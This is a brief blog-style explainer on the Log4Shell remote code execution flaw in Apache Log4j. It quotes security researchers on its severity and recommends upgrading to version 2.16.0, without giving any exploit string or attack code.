As you all know Log4j framework is used mostly by companies and government agencies to collect information about users' activities from networks, applications, and websites. It records the users' activity and the behavior of the application. It is mostly used because it is provided freely by Apache Software Foundation.
But recently a new vulnerability named Log4Shell is considered one of the worst cybersecurity flaws that have been discovered. This problem becomes serious because it allows hackers to access the application and let hackers run some malicious scripts on the server. It allows hackers to launch Remote Code Execution (RCE) attacks on java based servers. It makes the developers restless as there is a cybersecurity threat to global networks.
"This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable." - Marcus Hutchins
“This is a worst-case scenario. The combination of Log4j’s ubiquitous use in software and platforms, the many, many paths available to exploit the vulnerability, the dependencies that will make patching this vulnerability without breaking other things difficult and the fact that the exploit itself fits into a tweet. It's going to be a long weekend for a lot of people.” - Casey Ellis, founder, and CTO at Bugcrowd.
Security experts are now suggesting that organizations need to quickly update to a new version of the Log4j framework that the Apache Foundation released. They are recommending that all the customers who are on Log4j versions 2.15.0 and below need to upgrade to 2.16.0 as quickly as possible.
References
Log4j Vulnerability - https://logging.apache.org/log4j/2.x/security.html